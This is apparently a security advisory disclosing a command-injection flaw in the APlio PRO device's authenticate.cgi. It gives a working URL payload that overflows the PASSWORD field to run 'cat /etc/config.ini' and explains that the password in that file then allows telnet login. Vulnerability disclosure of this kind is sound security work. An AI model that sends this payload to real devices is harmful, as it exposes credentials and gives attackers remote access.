COMMAND

    APlio PRO

SYSTEMS AFFECTED

    APlio PRO

PROBLEM

    Anthony  Pardini  found  following.   This  URL  allows  for   the
    execution of commands via /bin/sh:

        http://ip/cgi-bin/authenticate.cgi?PASSWORD=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx010110101010101010101010110101010101010101010101010101010101010101010101010110101010101010298347019283740918273409182734091872340981723409871230498712309847109283740192834709128734091827340987123409XXcat%20%2Fetc%2Fconfig.ini

    After this you  can telnet in  by using the  passwd in the  config
    file...  They must setup this feature as there doesn't seem to  be
    a default password and there must be a password to login.

    Version:

        uClinux release 2.0.33, build #1 Wed May 31 11:55:22 CEST 2000
        uClinux/Aplio release 1.1.16, build # Wed May 31 11:57:37 CEST 2000

SOLUTION

    Nothing yet.